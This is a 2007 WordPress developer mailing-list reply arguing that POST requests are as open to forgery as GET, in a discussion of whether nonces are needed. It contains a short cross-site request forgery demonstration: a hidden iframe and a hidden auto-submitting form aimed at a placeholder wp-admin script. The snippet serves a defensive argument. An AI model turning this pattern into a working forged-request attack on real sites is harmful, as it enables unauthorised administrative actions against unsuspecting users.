[wp-hackers] Any other way to do it? (or, do we really need Nonces?)

Scott Yang scott.yang at gmail.com
Fri Mar 2 20:11:53 GMT 2007


<iframe name="foo" style="display:none"></iframe>
<form name="bar" target="foo" method="post"
action="http://yoursite/wp-admin/bad-script.php" style="display:none">
<input type="hidden" name="var1" value="value1"/>
<input type="hidden" name="var2" value="value2"/>
<input type="hidden" name="var3" value="value3"/>

<script type="text/javascript">

1. You can certainly post to a form outside your domain.
2. You can hide the form as well.
3. You can automated it via Javascript.
4. POST is about as insecure as GET


On 3/3/07, Elliotte Harold <elharo at metalab.unc.edu> wrote:
> The difference is you don't need to convince me to click on a link. You
> can force my browser to follow a link in several ways without any human
> intervention. That isn't the case with POST, I brought up the JavaScript
> because it had been suggested that could be used to force a POST without
>   human intervention. I'm not sure that's true but it's worth investigating.

More information about the wp-hackers mailing list